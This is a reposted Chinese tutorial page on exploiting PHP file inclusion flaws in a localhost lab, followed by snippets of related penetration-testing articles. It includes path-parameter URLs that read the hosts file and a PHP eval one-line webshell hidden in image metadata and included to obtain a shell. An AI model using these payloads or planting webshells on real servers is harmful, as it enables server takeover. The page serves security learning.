【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

9月前作者：百事都可樂. 分类：Toy博客阅读(46) 违法举报

这篇具有很好参考价值的文章主要介绍了【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

文件包含漏洞的利用

读取敏感文件

我们可以利用文件包含漏洞读取任意文件，读取文件的时候有利用条件

目标主机文件存在(目标文件的路径、绝对路径、相对路径)

具有文件可读权限

提交参数http://localhost/include/include.php?path=C:\windows\system32\drivers\etc\hosts，读取本地host文件

【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

提交参数http://localhost/include/include.php?path=http://www.cac.gov.cn/2021-01/22/c_1612887880656609.htm，读取远程文件，加载远程服务器上的文件

直接包含图片木马

可以利用文件包含漏洞直接包含图片木马

在include文件夹下新建wx.jpg图片文件

【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

点击文件右键选择属性，点击版型信息，选择版权，输入一句话木马

<?php @eval($_REQUEST[123]);?>

【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

打开浏览器输入http://localhost/include/include.php?path=./wx.jpg，进行访问文章来源地址https://www.toymoban.com/news/detail-501890.html

到了这里，关于【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

PHP文件包含漏洞(利用phpinfo)复现

PHP文件包含漏洞中，如果找不到可以包含的文件，我们可以通过包含临时文件的方法来拿到权限。因为临时文件名是随机的，如果目标网站上存在phpinfo，则可以通过phpinfo来获取临时文件名，进而进行包含。在给PHP发送POST数据包时，如果数据包里包含文件区块，无论你访问的

2024年02月16日
浏览(44)
phpinfo包含临时文件Getshell全过程及源码

目录前言原理漏洞复现靶场环境源码复现过程 PHP LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件，例如session文件、日志文件、临时文件等。但是，只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。假如在服务器上找不到我们可以包含

2024年02月12日
浏览(45)
PHP LFI 利用临时文件Getshell

PHP LFI 利用临时文件 Getshell 姿势-安全客 - 安全资讯平台 LFI 绕过 Session 包含限制 Getshell-安全客 - 安全资讯平台目录 PHP LFI 利用临时文件Getshell 临时文件 linux 和 windows的临时文件存储规则 linux和windows对临时文件的命名规则 PHPINFO()特性原理条件竞争 PHP7 Segment Fault 利用条件

2024年02月07日
浏览(48)
【实战系列3】IIS PUT文件上传漏洞GetShell

在前段时间做某医院🏥的渗透项目里，遇到了这个漏洞，说话话我还是第一次见这个漏洞，因为这个漏洞真的很老，只有在IIS的古老版本中才存在的漏洞，但是确实危害很大，而且最后可以成功shell了，所以也来做一个脱敏的完整渗透记录。提示：以下是本篇文章正文内容，

2024年02月15日
浏览(38)
实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell

前言，本次笔记是记录在工作中的打红队时挖到的用友时空KSOA任意文件上传漏洞。 emmm，怎么说呢，就是又在一次加班码到晚上十点的时候，挖掘到了一个用友时空ksoa v9.0文件上传漏洞。大家先看看长什么样吧，大概就这样！版本这么明目张胆的就展现在我面前，不找一下这

2024年02月08日
浏览(50)
如何利用文件上传漏洞-以及如何修复它们

𝓲’𝓶 𝓪 𝓵𝓾𝓷𝓪𝓽𝓲𝓬, 𝓱𝓪𝓱𝓪𝓱𝓪𝓱𝓪, 𝓪𝓷𝔂𝔀𝓪𝔂, 𝓲𝓯 𝔂𝓸𝓾 𝓭𝓸𝓷’𝓽 𝔀𝓾𝓷𝓭𝓮𝓻𝓼𝓽𝓪𝓷𝓭, 𝓘 𝓳𝓾𝓼𝓽 𝔀𝓻𝓲𝓽𝓮 𝓲𝓽 𝓬𝓪𝓼𝓾𝓪𝓵𝓵𝔂, 𝓘’𝓶 𝓪 𝓵𝓾𝓷𝓪𝓽𝓲𝓬 当服务器允许用户在不验证

2024年02月05日
浏览(50)
【Vulfocus靶场-初级】Tomcat后台弱口令+War包文件上传Getshell漏洞复现

之前听说过这个漏洞，也看过分析的文章，但是可惜护网实战一直遇不到tomcat，或者口令破不进去，挺遗憾的，所以找不到实战的例子来写，怕自己忘了没地方查，所以我就干脆拿个靶场来记记。提示：以下是本篇文章正文内容，下面案例可供参考在vulfocus官网注册一个账号

2024年02月09日
浏览(43)
03-WAF绕过-漏洞利用之注入上传跨站等绕过

1.绕过cc流量通过sqlmap对网站进行测试的时候，如果对方有cc流量防护，需要给sqlmap设置一个代理进行注入。防cc拦截：修改user-agent头+代理（付费代理池）修改user-agent头：（1）加参数：–random-agent 使用随机user-agent进行测试。sqlmap有一个文件中储存了各种各样的user-age

2024年02月02日
浏览(43)
文件包含漏洞及漏洞复现

程序开发人员通常会把可重复使用函数或语句写到单个文件中，形成“封装”。在使用某个功能的时候，直接调用此文件，无需再次编写，提高代码重用性，减少代码量。这种调用文件的过程通常称为包含。程序开发人员都希望代码更加灵活，所以会把被包含的文件的路径设

2024年02月10日
浏览(48)
文件包含漏洞学习笔记

相同内容或方法在多个页面显示或调用，文件包含漏洞又称为目录遍历漏洞或任意文件访问漏洞。分为本地文件包含（LFI：Local File Inclusion），远程文件包含（RFI：Remote File Inclusion），也可分为静态文件包含，动态文件包含。页面中直接引用静态文件。 main.php内容如下：

2023年04月08日
浏览(33)